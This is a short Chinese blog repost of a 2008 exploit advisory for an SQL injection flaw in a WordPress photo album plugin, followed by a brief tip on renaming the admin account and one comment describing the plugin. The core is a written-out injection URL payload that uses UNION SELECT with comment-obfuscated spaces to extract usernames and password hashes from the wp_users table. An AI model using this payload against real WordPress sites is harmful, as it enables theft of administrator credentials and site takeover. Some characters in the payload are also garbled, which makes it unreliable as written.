Home > wordpress支持, 漏洞 > Wordpress Photo album Remote SQL Injection Vulnerability

Wordpress Photo album Remote SQL Injection Vulnerability

February 18th, 2008

EXAMPLE
http://xxxxxxxx/?page_id=13&album= [exploit]
EXPLOİT
S@BUN&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0×7c,user_login,0×7c,user_pass,0×7c)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201
# WordPress album PHOTO SQL Injection# AUTHOR : S@BUN## HOME 1 : http://www.milw0rm.com/author/1334#
建议修改admin用户权限并建立一个不用于发文章的管理员用户或者直接进数据库修改admin为其他名字

, , , , , ,

转载原创文章请注明,转载自:Lin's Space|Only[http://clin003.com]

本文链接: http://clin003.com/exploits/wordpress-photo-album-remote-sql-injection-vulnerability-451/

Google比较注重原创性和时效性,若没有找到需要的内容可尝试以下搜素。

  1. wiki
    February 18th, 2008 at 23:56 | #1

    This plugin is designed to easily manage and display yourphoto albums within yourWordPress site.Plugin Admin FeaturesYou can find the plugin admin section under Manage then submenu Photos.Manage and create albumsMove photos to and from albumsUpload and delete photos

  1. No trackbacks yet.